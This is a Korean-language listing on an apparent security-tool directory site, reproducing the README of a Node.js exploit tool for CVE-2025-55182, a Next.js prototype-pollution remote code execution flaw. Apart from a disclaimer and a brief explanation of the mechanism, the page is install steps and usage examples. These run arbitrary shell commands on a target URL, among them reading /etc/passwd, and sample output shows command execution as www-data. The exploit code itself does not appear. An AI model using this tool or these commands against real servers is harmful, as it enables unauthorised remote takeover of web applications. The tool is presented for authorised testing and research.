Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/racall/cve-2025-55182-node
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubracall/cve-2025-55182-node

cve-2025-55182-node

CVE-2025-55182 Next.js RCE Exploit Tool

저장소 보기
18개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182 Next.js RCE 익스플로잇 도구

中文文档 | 漏洞原理分析


[!CAUTION]

⚠️ 면책 조항 - 사용 전 읽어주세요

이 도구는 다음 용도로만 사용해야 합니다:

  • 보안 연구원의 취약점 검증
  • 명시적 허가를 받은 공인된 침투 테스트
  • 교육 및 학습 목적

컴퓨터 시스템에 대한 무단 접근은 불법입니다.

이 도구를 사용함으로써 다음 사항에 동의하는 것으로 간주됩니다:

  1. 시스템을 테스트하기 전에 적절한 승인을 받았습니다.
  2. 이 도구를 악의적인 목적으로 사용하지 않습니다.
  3. 본인의 행동과 그로 인한 모든 결과에 대한 책임은 전적으로 본인에게 있습니다.

저자는 이 도구의 오용에 대해 어떠한 책임도 지지 않습니다.


Next.js 서버 측 프로토타입 오염 취약점에 대한 원격 코드 실행(RCE) 익스플로잇 도구입니다.

취약점 개요

CVE-2025-55182는 Next.js에 영향을 미치는 심각한 보안 취약점으로, 공격자가 프로토타입 오염을 악용한 특수 제작된 요청을 통해 원격 코드 실행을 달성할 수 있습니다.

📖 자세한 기술 분석은 EXPLOIT.md를 참조하세요.

영향을 받는 버전

  • Next.js의 특정 버전 (공식 보안 권고 참조)

작동 방식

이 취약점은 Next.js Server Actions 요청 처리 메커니즘을 악용하여, __proto__ 프로토타입 체인 오염과 Function 생성자를 결합해 임의 코드 실행을 달성합니다.

설치

root@kitploit:~
# Using yarn
yarn install

# Using npm
npm install

사용법

직접 실행

root@kitploit:~
# Basic usage
node index.js <target_url> [command]

# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"

yarn 스크립트 사용

root@kitploit:~
# Run the tool
yarn start http://localhost:3000 "whoami"

# Or use alias
yarn exploit http://localhost:3000 "ls -la"

# Show help
yarn help

전역 CLI 설치

root@kitploit:~
# Link globally
yarn link
# or
npm link

# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"

# Unlink
yarn unlink

CLI 옵션

root@kitploit:~
Usage:
  cve-2025-55182 <url> [command]

Arguments:
  url       Target URL (required)
  command   Command to execute (default: whoami)

Options:
  -h, --help     Show help message
  -v, --version  Show version number

출력 형식

이 도구는 JSON 형식으로 결과를 출력합니다:

성공적인 실행

root@kitploit:~
{
  "success": true,
  "message": "",
  "data": "command execution result"
}

실패한 실행

root@kitploit:~
{
  "success": false,
  "message": "error message",
  "data": null
}

예제

root@kitploit:~
$ cve-2025-55182 http://vulnerable-site.com "id"
{
  "success": true,
  "message": "",
  "data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}

의존성

  • axios - HTTP 클라이언트
  • form-data - FormData 빌더

참고 자료

  • Python 스크립트 참조
도구 다운로드